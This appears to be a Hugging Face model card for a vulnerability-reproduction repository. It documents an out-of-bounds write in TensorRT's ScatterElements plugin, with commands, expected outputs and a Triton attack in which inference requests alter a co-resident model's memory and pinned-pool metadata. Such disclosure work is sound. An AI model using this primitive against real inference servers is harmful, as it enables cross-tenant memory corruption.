Instructions to use rowandwhelan/tensorrt-scatterelements-oob-poc with libraries, inference providers, notebooks, and local apps. Follow these links to get started.
- Libraries
- TensorRT
How to use rowandwhelan/tensorrt-scatterelements-oob-poc with TensorRT:
# No code snippets available yet for this library. # To use this model, check the repository files and the library's documentation. # Want to help? PRs adding snippets are welcome at: # https://github.com/huggingface/huggingface.js
- Notebooks
- Google Colab
- Kaggle
| library_name: tensorrt | |
| tags: | |
| - security-research | |
| - vulnerability-reproduction | |
| - tensorrt | |
| - triton-inference-server | |
| # TensorRT ScatterElements GPU and mapped-host OOB write PoC | |
| This repository demonstrates that the stock TensorRT `ScatterElements` plugin uses runtime indices in GPU pointer arithmetic without normalization or bounds validation. | |
| Tested configurations: | |
| - TensorRT `11.1.0.106` on Windows | |
| - TensorRT `10.16.1.11` on Linux | |
| - Triton Inference Server `2.69.0` with TensorRT `10.16.1.11` | |
| - NVIDIA RTX 3080 Laptop GPU | |
| The artifacts are synthetic. They do not execute host code or access files. | |
| ## Local primitive | |
| Build the engine and run the local proof: | |
| ```bash | |
| python make_engine.py | |
| python run_probe.py | |
| ``` | |
| The proof checks three cases: | |
| 1. An out-of-range positive index updates a separate CUDA allocation. | |
| 2. The documented-valid index `-1` writes before the output buffer instead of selecting its last element. | |
| 3. An in-range control leaves the marker allocation unchanged. | |
| `host_pinned_probe.py` additionally targets a benign `cudaHostAllocPortable` marker through its CUDA device mapping: | |
| ```bash | |
| python host_pinned_probe.py | |
| ``` | |
| Expected result: | |
| ```text | |
| CROSS_ALLOCATION_WRITE=True | |
| VALID_NEGATIVE_INDEX_OOB_WRITE=True | |
| CONTROL_CLEAN=True | |
| MAPPED_HOST_WRITE=True | |
| ``` | |
| ## Triton cross-model proof | |
| The Linux plans were built with TensorRT `10.16.1.11`: | |
| - `scatter_elements_trt10.plan` | |
| - `victim_slow_trt10.plan` | |
| `start_triton.sh` expects the official Triton `2.69.0` standalone bundle under `~/triton-2.69/server/tritonserver` and the Python environment under `~/triton-2.69/venv`. | |
| Run the control and attack: | |
| ```bash | |
| ./start_triton.sh | |
| python triton_setup.py | |
| python triton_race_probe.py --skip-load 0 200 0.0 | |
| ./start_triton.sh | |
| python triton_setup.py | |
| python triton_race_probe.py --skip-load 740 200 0.0 | |
| ``` | |
| `triton_setup.py` uses Triton's model-load API to automate operator setup. With `--skip-load`, `triton_race_probe.py` makes no model-control request; the attack phase consists solely of ordinary inference requests to the deployed `scatter_writer` model while a co-resident model is executing. | |
| Expected result: | |
| ```text | |
| # control | |
| victim_before=31343.25 | |
| victim_after=31343.25 | |
| TARGET_CHANGED=False | |
| # attack | |
| victim_before=31343.25 | |
| victim_after=32680.5 | |
| TARGET_CHANGED=True | |
| ``` | |
| The fixed index `740` was reproduced against fresh, uninstrumented Triton processes. `cuda_trace.c` is included only to document how the relative GPU offset was initially measured; it is not loaded for the final control or attack runs. | |
| The same primitive reaches Triton's CUDA-pinned host pool. `triton_host_metadata_output.txt` records a remote inference request changing a live pool metadata word at `0x204c00030` from `0x10000000` to `0x44a72800`. GDB was used only to read the before/after bytes; the server and attack request were uninstrumented. | |
| ## Evidence | |
| - `windows_stock_output.txt`: local TensorRT 11.1 proof | |
| - `linux_stock_output.txt`: local TensorRT 10.16 proof | |
| - `triton_control_output.txt`: 200 in-range inference requests | |
| - `triton_attack_repeatability.txt`: three fresh Triton attack runs | |
| - `windows_host_pinned_output.txt` and `linux_host_pinned_output.txt`: mapped host-marker writes | |
| - `triton_host_metadata_output.txt`: remote write into live Triton pinned-pool metadata | |
| ## SHA-256 | |
| ```text | |
| 02cc96cfa0c55c21058c0266ec85f72326f0c19cf245f01dac95f858d20c16fd scatter_elements.engine | |
| 37640bd4f3d153cb23e3e147f8127d7ce0558065fd09de21593d9a26f52bc4ae scatter_elements_trt10.plan | |
| 1f51adc48f98615d548a5a3a7f0f320e3c1b23e7f48205b21554ba850379d7b0 victim_slow_trt10.plan | |
| ``` | |